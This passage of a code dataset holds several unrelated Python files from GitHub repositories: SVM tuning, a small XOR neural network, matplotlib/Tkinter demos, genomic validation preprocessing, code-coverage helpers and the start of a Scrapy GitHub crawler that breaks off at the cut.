\r\n\r\n\r\n\r\ndef prosesRbf(C:tuple, max_iter:tuple, gamma:tuple, x_train: 'array', y_train: 'array', cv : int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = i,\r\n max_iter = j,\r\n gamma = k\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X=x_train,\r\n y=y_train,\r\n cv=cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n \r\n rbf.append([score, i, j, k]) \r\n\r\n\r\n\r\ndef prosesSigmoid(C:tuple, max_iter:tuple, gamma:tuple, coef0:tuple, x_train: 'array', y_train: 'array', cv:int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n for l in coef0:\r\n svm = SVC(\r\n kernel = 'sigmoid',\r\n C = i,\r\n max_iter = j,\r\n gamma = k,\r\n coef0 = l\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n sigmoid.append([score, i, j, k, l]) \r\n\r\n\r\n\r\ndef prosesPoly(C:tuple, max_iter:tuple, gamma:tuple, coef0:tuple, degree:tuple, x_train: 'array', y_train: 'array', cv:int):\r\n for i in C:\r\n for j in max_iter:\r\n for k in gamma:\r\n for l in coef0:\r\n for m in degree:\r\n svm = SVC(\r\n kernel = 'sigmoid',\r\n C = i,\r\n max_iter = j,\r\n gamma = k,\r\n coef0 = l,\r\n degree = m\r\n )\r\n\r\n results = cross_validate(estimator=svm,\r\n X = x_train,\r\n y = y_train,\r\n cv = cv)\r\n\r\n \r\n score = float(results['test_score'].mean())\r\n\r\n poly.append([score, i, j, k, l,m]) \r\n\r\n\r\ndef akurasiTiapSplit(x, y, iterasi):\r\n for i in range(5):\r\n temp = []\r\n dTest = 0.0\r\n for j in range(iterasi):\r\n dTest += 0.1\r\n\r\n x_train, x_test, y_train, y_test = splitData(x, y, dTest, 
101)\r\n\r\n\r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = 3.6,\r\n max_iter = 799,\r\n gamma = 'scale' \r\n ) \r\n \r\n svm.fit(x_train,y_train)\r\n y_pred = svm.predict(x_test)\r\n score = metrics.accuracy_score(y_test, y_pred)\r\n \r\n temp.append([score, round(dTest, 1)])\r\n split_data.append(temp)\r\n\r\n\r\n\r\ndef prosesKernel(x, y, cv, C:list, max_iter:list, gamma:list, coef0:list, degree:list):\r\n prosesLinear(C, max_iter, x, y, cv)\r\n prosesRbf(C, max_iter, gamma, x, y, cv)\r\n prosesSigmoid(C, max_iter, gamma, coef0, x, y, cv)\r\n prosesPoly(C, max_iter, gamma, coef0, degree, x, y, cv)\r\n akurasiTiapSplit(x, y, 5)\r\n \r\n \r\n\r\ndef hasilKlasifikasi(banding1:list, banding2:list)->pd.DataFrame:\r\n\r\n hasil_klasifikasi = classification_report(banding1, banding2,output_dict=True)\r\n\r\n hasil_klasifikasi.pop('macro avg')\r\n hasil_klasifikasi.pop('weighted avg')\r\n hasil_klasifikasi['mild'].pop('support')\r\n hasil_klasifikasi['severe'].pop('support')\r\n\r\n hasil_klasifikasi = pd.DataFrame(hasil_klasifikasi).transpose()\r\n hasil_klasifikasi.iloc[2,:-1] = np.nan\r\n \r\n return hasil_klasifikasi\r\n\r\n\r\ndef prosesTrain(x_train:list, y_train:list)->object: \r\n svm = SVC(\r\n kernel = 'rbf',\r\n C = 3.6,\r\n max_iter = 799,\r\n gamma = 'auto'\r\n )\r\n svm.fit(x_train,y_train)\r\n \r\n return svm\r\n \r\n\r\ndef predictDataTesting(x, y, svm, encode:object):\r\n\r\n y_pred = svm.predict(x)\r\n score = metrics.accuracy_score(y, y_pred)\r\n\r\n y_testNominal = encodingInversTransfom(encode, y)\r\n y_predictNominal = encodingInversTransfom(encode, y_pred)\r\n\r\n cnfMatrix = confusion_matrix(y_testNominal, y_predictNominal)\r\n\r\n hasil_klasifikasi = hasilKlasifikasi(y_testNominal, y_predictNominal)\r\n # y_testNominal = encodingInversTransfom(encodeSeverity,y_test)\r\n # y_predictNominal = encodingInversTransfom(encodeSeverity, y_pred)\r\n\r\n banding = pd.DataFrame({'y_test': y_testNominal, 'y_pred': y_predictNominal}, columns=['y_test', 'y_pred'])\r\n\r\n\r\n return score, cnfMatrix, hasil_klasifikasi, banding, y_pred\r\n\r\ndef predictNewData(data:'Dataframe', svm:object, encode:object ):\r\n X_dummy_scaled = scaling(data.iloc[:,:-1])\r\n y_dummy_scaled = data.iloc[:,-1]\r\n\r\n score_dummy, cnfMatrix_dummy, hasil_klasifikasi_dummy, banding_dummy, y_pred = predictDataTesting(X_dummy_scaled, y_dummy_scaled, svm, encode)\r\n\r\n return score_dummy, cnfMatrix_dummy, hasil_klasifikasi_dummy, banding_dummy \r\n \r\n ","repo_name":"kazuma313/Penelitian","sub_path":"modul/proses.py","file_name":"proses.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18322910004","text":"from turtle import Turtle\nfrom random import *\n\nt = Turtle()\nt.speed(10)\nt.shape('turtle')\n\nn = 50\nfor i in range(n):\n t.forward(randint(-30, 30))\n t.left(randint(0, 360))\n t.backward(randint(-30, 30))\n t.right(randint(0, 360))\n","repo_name":"stsln/python","sub_path":"Практика програмирвания Python (2020)/Лабораторная работа №3/1ypr.py","file_name":"1ypr.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74653536553","text":"import numpy as np\r\nimport random\r\n\r\n\r\nclass Nureal():\r\n lerning_rate = 0.4\r\n\r\n def __init__(self, size, id=None,weight= None,baises=None):\r\n if weight == None :\r\n self.weight = np.array([np.random.rand(size[i + 1], size[i]) for i in range(len(size) - 
1)],dtype=np.ndarray)\r\n else:\r\n self.weight = weight\r\n if baises == None:\r\n self.biases = np.array([np.random.rand(j, 1) for j in size[1:]],dtype=np.ndarray)\r\n else:\r\n self.biases = baises\r\n # self.weight = [np.ones((size[i + 1], size[i])) for i in range(len(size) - 1)]\r\n # self.biases = [np.ones((j, 1)) for j in size[1:]]\r\n self.changed_weight = []\r\n self._output = []\r\n self._input = []\r\n self.point = 0\r\n self.id = id\r\n self.hidden_layers = []\r\n self.all_layers = []\r\n self.hidden_layers_error = []\r\n\r\n def forward(self, input):\r\n self._output = []\r\n self.hidden_layers = []\r\n self.all_layers = []\r\n self.hidden_layers_error = []\r\n input = [[i] for i in input]\r\n self._input = np.array(input, dtype=np.ndarray)\r\n self.all_layers = [self._input]\r\n input = np.array(input)\r\n for l in range(len(self.weight)):\r\n if l == len(self.weight) - 1:\r\n self._output = np.add(np.matmul(self.weight[l], input), self.biases[l])\r\n continue\r\n input = np.add(np.matmul(self.weight[l], input), self.biases[l])\r\n input = self.activation_sigmoid(input)\r\n self.hidden_layers.append(input)\r\n self.all_layers.append(input)\r\n self._output = self.activation_sigmoid(self._output)\r\n # self._output = self.activation_relue(self._output)\r\n self.all_layers.append(self._output)\r\n return self._output\r\n\r\n def activation_relue(self, layer):\r\n layer = np.array(layer, dtype=np.ndarray)\r\n k = layer.argmax()\r\n for i in range(len(layer)):\r\n if i == k:\r\n for j in range(len(layer[i])):\r\n layer[i][j] = float(1.0)\r\n else:\r\n for j in range(len(layer[i])):\r\n layer[i][j] = float(0.0)\r\n return layer\r\n\r\n def activation_softmax(self, layer):\r\n m = (np.exp(layer))\r\n return m / m.sum()\r\n\r\n def activation_sigmoid(self, layer):\r\n layer = layer.astype(float)\r\n try:\r\n np.exp(-layer)\r\n except TypeError:\r\n print(layer)\r\n return 1 / (1 + np.exp(-layer))\r\n\r\n @staticmethod\r\n def sigmoiddelta(error, output):\r\n ones = [[1] for i in range(len(output))]\r\n return np.multiply(error, np.multiply(output, np.subtract(ones, output)))\r\n\r\n @staticmethod\r\n def error_calculation(result, output):\r\n error = np.subtract(output, result)\r\n return error\r\n\r\n @staticmethod\r\n def delta(error):\r\n return (np.multiply(Nureal.lerning_rate, error))\r\n\r\n @staticmethod\r\n def transpose(m):\r\n return np.matrix.transpose(m)\r\n\r\n def backward(self, result):\r\n result = [[i] for i in result]\r\n error = Nureal.error_calculation(result, self._output)\r\n self.hidden_layers_error.append(error)\r\n for i in range(len(self.hidden_layers)):\r\n temp = np.matmul(Nureal.transpose(self.weight[-1 - i]), self.hidden_layers_error[0])\r\n # temp = np.matmul(Nureal.transpose(self.weight[-1 - i]),\r\n # Nureal.sigmoiddelta(self.hidden_layers_error[0],self.all_layers[-1-i]))\r\n self.hidden_layers_error.insert(0, temp)\r\n\r\n for i in range(len(self.weight)):\r\n temp = np.matmul(Nureal.sigmoiddelta(self.hidden_layers_error[i], self.all_layers[i + 1]),\r\n Nureal.transpose(self.all_layers[i]))\r\n\r\n self.weight[i] = np.subtract(self.weight[i], Nureal.delta(temp))\r\n self.biases[i] = np.subtract(self.biases[i],\r\n Nureal.delta(\r\n Nureal.sigmoiddelta(self.hidden_layers_error[i], self.all_layers[i + 1])))\r\n\r\n self._output = []\r\n return error\r\na = Nureal([2,4,1])\r\nb = [[1,1],[1,0],[0,0],[0,1]]\r\n\r\nfor j in range(600):\r\n for i in b:\r\n output = a.forward(i)\r\n if i == [0,0] or i == [1,1]:\r\n a.backward([0])\r\n else:\r\n 
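# [1, 0] and [0, 1] are the XOR-true inputs, so the training target is 1\r\n            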
a.backward([1])\r\n    print(j)\r\nfor i in b:\r\n    print(i, a.forward(i))\r\n","repo_name":"bodhisatw/nn-genatic-python","sub_path":"NN_1.py","file_name":"NN_1.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17385463927","text":"from queue import *\nfrom utilDataStructure import *\n\nd = UtilDataStructure()\n\nclass AnagramUsingQueue:\n    s = Queue()\n\n    def addToQueue(self, lower_range, upper_range):\n        low = lower_range\n        while low < 2 :  # primes start at 2, so clamp the lower bound\n            low += 1\n        for i in range(low, upper_range):\n            if d.primeAnagram(i):\n                self.s.enqueue(i)\n\n    def reversePrimeAnagram(self):\n        arr = ['Anagram prime number from higher range to lower range']\n        while self.s.size() != 0:\n            num = self.s.dequeue()\n            arr.append(num)\n        return arr\n\nan = AnagramUsingQueue()\ntry:\n    lower_range = int(input('Enter lower range : '))\n    upper_range = int(input('Enter upper range : '))\nexcept ValueError:\n    print('Please enter suitable input and try again : ')\n    exit()  # stop here, otherwise the undefined ranges would be used below\n\nan.addToQueue(lower_range,upper_range)\narray = an.reversePrimeAnagram()\nprint(array)\n","repo_name":"santoshikalaskar/Basic_Advance_python_program","sub_path":"Python-dataStructure/dataStructure/anagramUsingQueue.py","file_name":"anagramUsingQueue.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30798309556","text":"empty_list = []\neven = [2, 4, 6, 8]\nodd = [1, 3, 5, 7, 9]\n\nnumbers = even + odd\nprint(numbers)\n\n# Returns a list of integers\nsorted_numbers = sorted(numbers)\nprint(sorted_numbers)\nprint(numbers)\n\n# Returns a list of individual strings\ndigits = sorted(\"432985617\")\nprint(digits)\n\n# We can create an un-sorted list of individual strings using the list class initializer\ndigits_list = list(\"432985617\")\nprint(digits_list)\n\n# There are various ways to copy lists\nmore_numbers = list(numbers)\nmore_numbers_2 = numbers[:]\nmore_numbers_3 = numbers.copy() # This is the easiest way\n","repo_name":"sheikh210/LearnPython","sub_path":"data_structures/lists/lists_creation.py","file_name":"lists_creation.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69926570472","text":"'''\nCreated on Apr 2, 2019\n\n@author: Stalker\n'''\n\nimport time\nfrom datetime import datetime\n\nimport numpy as np\n\nimport matplotlib as mpl\nmpl.use(\"TkAgg\")\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nimport matplotlib.ticker as ticker\n\ndef _print_event(event, attr_list):\n    print()\n    print('**** {} ****'.format(event.name))\n    print('  ' + str(type(event)))\n    for attr in attr_list:\n        title = 'event.' 
+ attr\n        value = getattr(event, attr)\n        line = '  {title:20}: {value}'.format(title=title, value=value)\n        print(line)\n\ndef onMouseEvent(event):\n    # type: (matplotlib.backend_bases.MouseEvent) -> None\n    ''' Handler for mouse-related events '''\n    attr_list = ['name',\n                 'dblclick', 'button', 'key',\n                 'xdata', 'ydata',\n                 'x', 'y',\n                 'inaxes',\n                 'step',\n                 'guiEvent']\n    _print_event(event, attr_list)\n\ndef onKeyEvent(event):\n    # type: (matplotlib.backend_bases.KeyEvent) -> None\n    ''' Handler for keyboard-related events '''\n    attr_list = ['name',\n                 'key',\n                 'xdata', 'ydata',\n                 'x', 'y',\n                 'inaxes',\n                 'guiEvent']\n    _print_event(event, attr_list)\n\n\ndef events():\n    # Compute the function\n    x = np.arange(0, 5 * np.pi, 0.01)\n    y = np.sin(x) * np.cos(3 * x)\n\n    # Draw the plot\n    fig = plt.figure()\n    plt.plot(x, y)\n\n    # Mouse-related events\n    button_press_event_id = fig.canvas.mpl_connect('button_press_event',\n                                                   onMouseEvent)\n    button_release_event_id = fig.canvas.mpl_connect('button_release_event',\n                                                     onMouseEvent)\n    scroll_event_id = fig.canvas.mpl_connect('scroll_event',\n                                             onMouseEvent)\n\n    # Keyboard-related events\n    key_press_event_id = fig.canvas.mpl_connect('key_press_event',\n                                                onKeyEvent)\n    key_release_event_id = fig.canvas.mpl_connect('key_release_event',\n                                                  onKeyEvent)\n\n    plt.show()\n\n    # Unsubscribe from the events\n    fig.canvas.mpl_disconnect(button_press_event_id)\n    fig.canvas.mpl_disconnect(button_release_event_id)\n    fig.canvas.mpl_disconnect(scroll_event_id)\n    fig.canvas.mpl_disconnect(key_press_event_id)\n    fig.canvas.mpl_disconnect(key_release_event_id)\n\n# custom toolbar with lorem ipsum text\nclass CustomToolbar(NavigationToolbar2Tk):\n    def __init__(self,canvas_,parent_):\n        self.toolitems = (\n            ('Home', 'Lorem ipsum dolor sit amet', 'home', 'home'),\n            ('Back', 'consectetuer adipiscing elit', 'back', 'back'),\n            ('Forward', 'sed diam nonummy nibh euismod', 'forward', 'forward'),\n            (None, None, None, None),\n            ('Pan', 'tincidunt ut laoreet', 'move', 'pan'),\n            ('Zoom', 'dolore magna aliquam', 'zoom_to_rect', 'zoom'),\n            (None, None, None, None),\n            ('Subplots', 'putamus parum claram', 'subplots', 'configure_subplots'),\n            ('Save', 'sollemnes in futurum', 'filesave', 'save_figure'),\n            )\n        NavigationToolbar2Tk.__init__(self,canvas_,parent_)\n\n    def pan(self):\n        NavigationToolbar2Tk.pan(self)\n        self.mode = \"I'm panning!\" #<--- whatever you want to replace \"pan/zoom\" goes here\n        self.set_message(self.mode)\n\n    def zoom(self):\n        NavigationToolbar2Tk.zoom(self)\n        self.mode = \"I'm zooming!\" #<--- whatever you want to replace \"zoom rect\" goes here\n        self.set_message(self.mode)\n\nclass MyApp(object):\n    def __init__(self,root):\n        self.root = root\n        self._init_app()\n\n    # here we embed a figure in the Tk GUI\n    def _init_app(self):\n        self.figure = mpl.figure.Figure()\n        self.ax = self.figure.add_subplot(111)\n        self.canvas = FigureCanvasTkAgg(self.figure,self.root)\n        self.toolbar = CustomToolbar(self.canvas,self.root)\n        self.toolbar.update()\n        self.plot_widget = self.canvas.get_tk_widget()\n        self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n        self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n        self.canvas.draw()\n\n    # plot something random\n    def plot(self):\n        self.ax.imshow(np.random.normal(0.,1.,size=[100,100]),cmap=\"hot\",aspect=\"auto\")\n        self.figure.canvas.draw()\n\ndef navigator():\n    root = tk.Tk()\n    app = MyApp(root)\n    app.plot()\n    root.mainloop()\n\ndef hist(ax, xdate, candles, size):\n    ''' '''\n\ndef simple():\n    x = np.asarray(range(20))\n    y1 = 
4*x\n    y2 = [i**2 for i in x]\n\n    fig, ax = plt.subplots(figsize=(8, 6))\n    ax.set_title(\"Plots of y1=4*x and y2=x^2\", fontsize=16)\n    ax.set_xlabel(\"x\", fontsize=14) \n    ax.set_ylabel(\"y1, y2\", fontsize=14)\n    ax.grid(which=\"major\", linewidth=1.2)\n    ax.grid(which=\"minor\", linestyle=\"--\", color=\"gray\", linewidth=0.5, alpha=0.5)\n\n    ax.scatter(x, y1, c=\"red\", label=\"y1 = 4*x\")\n    ax.plot(x, y2, label=\"y2 = x^2\")\n    ax.bar(x, y2-y1, bottom=x, color='green', width=0.5, zorder=1, label=\"bars\")\n\n    ax.axhline(y=50, color=\"red\")\n\n    ax.legend()\n    ax.text(.200, .400, \"Text\"\n            , color='blue', fontsize=16\n            ,horizontalalignment='left', verticalalignment='center'\n            ,transform=ax.transAxes\n            )\n\n    ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())\n    ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\n    ax.xaxis.set_zorder(-1) # hide the grid behind the bars (doing this in the grid() call does not work)\n    ax.yaxis.tick_right() # put the y-axis on the right\n\n    ax.tick_params(which='major', length=20, width=2)\n    ax.tick_params(which='minor', length=1, width=1)\n\n    #ax.set_xmargin(0.2) # Widen the interval by 20%\n    #ax.set_ymargin(-0.1) # Trim it by 10%\n    ax.margins(0.2, -0.1) # Same effect (results may differ without autoscaling)\n\n    ax.set_xbound(2, 8) # How is this different ???\n    ax.set_xlim(1, 10) # Set the visible region; overrides margins\n    ax.set_ybound(0, 200) # How is this different ???\n    #ax.autoscale(enable=True, axis='y', tight=True) # tight zeroes out the margins\n\n    #ax.set_axis_off() # Turn off drawing of the axes\n\n    ax.set_xticks([2, 4, 6, 8])\n    ax.set_xticklabels([\"1\", \"3\", \"5\"])\n\n    print(\"bounds\", str(ax.get_xbound()), str(ax.get_ybound()))\n    print(\"zorder:\", str(ax.get_axisbelow()))\n    print(\"scale:\", ax.get_xscale(), ax.get_yscale())\n    print(\"frame:\", str(ax.get_frame_on()), str(ax.get_aspect()), str(ax.get_adjustable()))\n    print(\"ticks:\", str(ax.get_xticks()))\n    tl = ax.get_xticklabels()\n\n    plt.show()\n\nimport tkinter as tk\ndef mptk():\n    root = tk.Tk()\n    parent = tk.Frame(root,width=1500,height=100,bg=\"darkred\", bd=20) # bd is required\n\n    fig = plt.Figure(figsize=(5, 4), dpi=100)\n    t = np.arange(0, 3, .01)\n    fig.add_subplot(111).plot(t, 2 * np.sin(2 * np.pi * t))\n\n    canvas = FigureCanvasTkAgg(fig, master=root)  # A tk.DrawingArea.\n    canvas.draw()\n    canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n    toolbar = NavigationToolbar2Tk(canvas, root)\n    toolbar.update()\n    canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n    root.mainloop()  # keep the window alive when run as a script\n\n#mptk()\n#simple()\n#hist2()\n#axis()\n","repo_name":"stalker138/Python","sub_path":"Plot/MatPlot.py","file_name":"MatPlot.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13996217258","text":"import pandas as pd\nimport parse_data as parser\nimport numpy as np\nimport joblib\nfrom main_params import MainParams\nfrom liftover import get_lifter\n\np = MainParams()\ntrain_info, valid_info, test_info, _ = parser.parse_sequences(p)\ninfos = train_info + valid_info + test_info\ndf = pd.read_csv(\"data/validation/fulco2016_original.tsv\", sep=\"\\t\")\ndf.loc[df['Set'] == 'MYC Tiling', \"Gene\"] = \"MYC\"\ndf.loc[df['Set'] == 'GATA1 Tiling', \"Gene\"] = \"GATA1\"\na = df['Gene'].unique()\nhead = joblib.load(f\"{p.pickle_folder}heads.gz\")[\"hg38\"][\"expression\"]\nf5_tracks = []\nfor track in head:\n    if \"FANTOM5\" in track and \"K562\" in track:\n        f5_tracks.append(track)\nprint(f\"FANTOM5 K562 tracks 
{len(f5_tracks)}\")\nload_info = []\ngene_names = {}\nfound_genes = set()\nfor info in infos:\n ig = info[6]\n if ig in a:\n mid = info[1] // p.bin_size\n # len(load_info) is index to link info[1] (tss) to loaded values\n gene_names.setdefault(ig, []).append([len(load_info), info[1]])\n load_info.append([info[0], mid])\n found_genes.add(ig)\n\nnot_found_genes = set(a) - found_genes\nprint(f\"Not found {len(not_found_genes)} genes\")\nprint(df.shape)\ndf = df[~df.Gene.isin(not_found_genes)]\nprint(df.shape)\n\nprint(f\"Load info {len(load_info)}\") \n\nprint(\"Loading ground truth tracks\")\ngt = parser.par_load_data(load_info, f5_tracks, p)\nprint(gt.shape)\ngt = np.mean(gt, axis=-1)\nprint(gt.shape)\n# Major TSS is the one with the biggest average value in K562\nfor gene in gene_names:\n max_val = -1\n max_tss = -1\n for tss in gene_names[gene]:\n if gt[tss[0]] > max_val:\n max_val = gt[tss[0]]\n max_tss = tss[1]\n df.loc[df['Gene'] == gene, 'Gene'] = max_tss + 1 # not 0 based!\n \ndf[\"mid\"] = df[\"start\"] + (df[\"end\"] - df[\"start\"]) // 2\ndf = df.rename(columns={'Gene': 'tss', \"CRISPRi Score\": \"score\"})\n\n# TSS is already hg38\nconverter = get_lifter('hg19', 'hg38')\ninds = []\nfor index, row in df.iterrows(): \n try:\n df.at[index,'mid'] = converter[row[\"chr\"]][row[\"mid\"]][0][1]\n except:\n inds.append(index)\n# Remove validation that could not be lifted\ndf.drop(df.index[inds], inplace=True)\ndf = df[np.abs(df[\"mid\"] - df[\"tss\"]) > 2000]\ndf_enhancer_screen_pos = df[df[\"score\"] < -0.5].copy()\ndf_enhancer_screen_pos['Significant'] = True\n\ndf_enhancer_screen_neg = df[df[\"score\"] > 0.0].copy()\ndf_enhancer_screen_neg['Significant'] = False\n\ndf = pd.concat([df_enhancer_screen_pos, df_enhancer_screen_neg], ignore_index=True, axis=0)\nprint(df['Significant'].value_counts())\n\ndf1 = df[df.Set == \"Protein Coding Gene Promoters\"]\ndf1 = df1[[\"chr\", \"tss\", \"mid\", 'Significant']]\ndf1.to_csv(\"data/validation/fulco2016_processed.tsv\", index=False, sep=\"\\t\")\n\ndf2 = df[df['Set'].isin([\"MYC Tiling\", \"GATA1 Tiling\"])]\ndf2 = df2[[\"chr\", \"tss\", \"mid\", 'Significant', 'score']]\ndf2.to_csv(\"data/validation/fulco2016_tiling.tsv\", index=False, sep=\"\\t\")","repo_name":"umarov90/Chromix","sub_path":"validation/process_fulco2016.py","file_name":"process_fulco2016.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3217010659","text":"\nfrom changes.config import db\nfrom changes.constants import Status\nfrom changes.models.build import Build\nfrom changes.models.filecoverage import FileCoverage\nfrom changes.models.job import Job\nfrom changes.models.project import Project\nfrom changes.models.source import Source\nfrom typing import Iterable, NamedTuple, Set # NOQA\n\n\ndef get_coverage_by_source_id(source_id):\n \"\"\"\n Takes a source_id and returns a dictionary of coverage for that source_id. 
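If no project has a finished build for the source, an empty dict is returned. 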
The\n    coverage is generated for the most recently finished builds for each project.\n\n    The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n    'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n    \"\"\"\n    source = Source.query.get(source_id)\n\n    projects = Project.query.filter(\n        Project.repository_id == source.repository_id\n    )\n\n    newest_build_ids = set()\n    for project in projects:\n        b_id = db.session.query(Build.id).filter(\n            Build.project_id == project.id,\n            Build.source_id == source_id,\n            Build.status == Status.finished\n        ).order_by(Build.date_created.desc()).first()\n        if b_id:\n            newest_build_ids.add(b_id[0])\n\n    return get_coverage_by_build_ids(newest_build_ids)\n\n\ndef get_coverage_by_build_id(build_id):\n    return get_coverage_by_build_ids([build_id])\n\n\ndef get_coverage_by_build_ids(build_ids):\n    \"\"\"\n    Returns the coverage associated with some builds.\n\n    The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n    'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n    \"\"\"\n    if not build_ids:\n        return {}\n\n    all_job_ids = db.session.query(Job.id).filter(\n        Job.build_id.in_(build_ids)\n    )\n\n    return get_coverage_by_job_ids(all_job_ids)\n\n\ndef get_coverage_by_job_ids(job_ids):\n    \"\"\"\n    Returns the coverage associated with some jobs.\n\n    The dictionary maps file names to a string of the form 'UNCCCNCU', where U means\n    'uncovered', C means 'covered' and 'N' means 'no coverage info'.\n    \"\"\"\n    if not job_ids:\n        return {}\n\n    return FileCoverage.query.filter(\n        FileCoverage.job_id.in_(job_ids)\n    )\n\n\ndef merge_coverage(old, new):\n    # type: (str, str) -> str\n    \"\"\"Merge two coverage strings.\n\n    Each of the arguments is compact coverage data as described for\n    get_coverage_by_job_ids(), and so is the return value.\n\n    The merged string contains the 'stronger' of the two corresponding\n    characters, where 'C' defeats 'U' and both defeat 'N'.\n    \"\"\"\n    cov_data = []\n    for lineno in range(max(len(old), len(new))):\n        try:\n            old_cov = old[lineno]\n        except IndexError:\n            old_cov = 'N'\n\n        try:\n            new_cov = new[lineno]\n        except IndexError:\n            new_cov = 'N'\n\n        if old_cov == 'C' or new_cov == 'C':\n            cov_data.append('C')\n        elif old_cov == 'U' or new_cov == 'U':\n            cov_data.append('U')\n        else:\n            cov_data.append('N')\n    return ''.join(cov_data)\n\n\ndef merged_coverage_data(coverages):\n    # type: (Iterable[FileCoverage]) -> Dict[str, str]\n    \"\"\"Return a dict of merged coverage data by filename.\n\n    The argument is an iterable of FileCoverage instances. 
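Entries that share a filename are merged with merge_coverage, so e.g. 'CNU' combined with 'UCN' yields 'CCU'. 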
The return\n    value is a dict mapping filenames to the merged coverage data in\n    the form as described for get_coverage_by_job_ids().\n    \"\"\"\n    coverage = {}  # type: Dict[str, str]\n    for c in coverages:\n        data = coverage.get(c.filename)\n        if data:\n            data = merge_coverage(data, c.data)\n        else:\n            data = c.data\n        coverage[c.filename] = data\n    return coverage\n\n\nCoverageStats = NamedTuple(\n    'CoverageStats',\n    [('lines_covered', int),\n     ('lines_uncovered', int),\n     ('diff_lines_covered', int),\n     ('diff_lines_uncovered', int)])\n\n\ndef get_coverage_stats(diff_lines, data):\n    # type: (Set[int], str) -> CoverageStats\n    \"\"\"Return a tuple of coverage stats.\"\"\"\n\n    lines_covered = 0\n    lines_uncovered = 0\n    diff_lines_covered = 0\n    diff_lines_uncovered = 0\n\n    for lineno, code in enumerate(data):\n        # lineno is 1-based in diff\n        line_in_diff = bool((lineno + 1) in diff_lines)\n        if code == 'C':\n            lines_covered += 1\n            if line_in_diff:\n                diff_lines_covered += 1\n        elif code == 'U':\n            lines_uncovered += 1\n            if line_in_diff:\n                diff_lines_uncovered += 1\n\n    return CoverageStats(lines_covered, lines_uncovered, diff_lines_covered, diff_lines_uncovered)\n","repo_name":"dropbox/changes","sub_path":"changes/lib/coverage.py","file_name":"coverage.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"13258842344","text":"#\n#\n#\n\ndef my_range(*args):\n    start = 0\n    stop = 1\n    try:\n        if len(args) == 1:\n            stop = args[0]\n        elif len(args) == 2:\n            start = args[0]\n            stop = args[1]\n\n        while start < stop:\n            yield start\n            start += 1\n\n    except Exception as err:\n        print(err)\n\n\ntype(my_range()) # <class 'generator'>\n\nmy_list = my_range(1)\nfor i in my_list:\n    print(i)\n\n# 0\n\ntype(my_list) # <class 'generator'>\n\nmy_list = my_range(1, 5)\nfor i in my_list:\n    print(i)\n\n# 1\n# 2\n# 3\n# 4\n\nmy_list = my_range(4)\nfor i in my_list:\n    print(i)\n\n# 0\n# 1\n# 2\n# 3\n\n\nfor num in my_range(1, 6):\n    print(num)\n\n# 1\n# 2\n# 3\n# 4\n# 5\n\n\nnew_gen = (num for num in range(3, 6))\n\ntype(new_gen) # <class 'generator'>\n\nfor x in new_gen:\n    print(x)\n","repo_name":"arif-eker/python_workspace","sub_path":"lecture_2/iterators_generators/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43038153969","text":"import scrapy\r\nimport time\r\nimport json\r\n\r\n\r\nclass JsonWriterPipeline:\r\n    def open_spider(self, spider):\r\n        self.file = open(\"github.jl\", \"w\", encoding='utf-8')\r\n\r\n    def close_spider(self, spider):\r\n        self.file.close()\r\n\r\n    def process_item(self, item, spider):\r\n        line = json.dumps(item)\r\n        self.file.write(f\"{line}\\n\")\r\n        return item\r\n\r\n\r\n\r\n# Gajesh Bhat, https://gist.github.com/gajeshbhat/67a3db79a6aecd1db42343190f9a2f17\r\ndef convert_str_to_number(x):\r\n    if x:\r\n        total_nums = 0\r\n        num_map = {\"K\": 1000, \"M\": 1000000, \"B\": 1000000000}\r\n        if x.isdigit():\r\n            total_nums = int(x)\r\n        else:\r\n            if len(x) > 1:\r\n                total_nums = float(x[:-1]) * num_map.get(x[-1].upper(), 1)\r\n        return int(total_nums)\r\n    else:\r\n        return 0\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass GitpySpider(scrapy.Spider):\r\n    name = \"gitpySpider\"\r\n    allowed_domains = ['github.com']\r\n    custom_settings = {\r\n        \"ITEM_PIPELINES\": {JsonWriterPipeline: 401},\r\n        \"CONCURRENT_REQUESTS\": 1,\r\n        \"DOWNLOAD_TIMEOUT\": 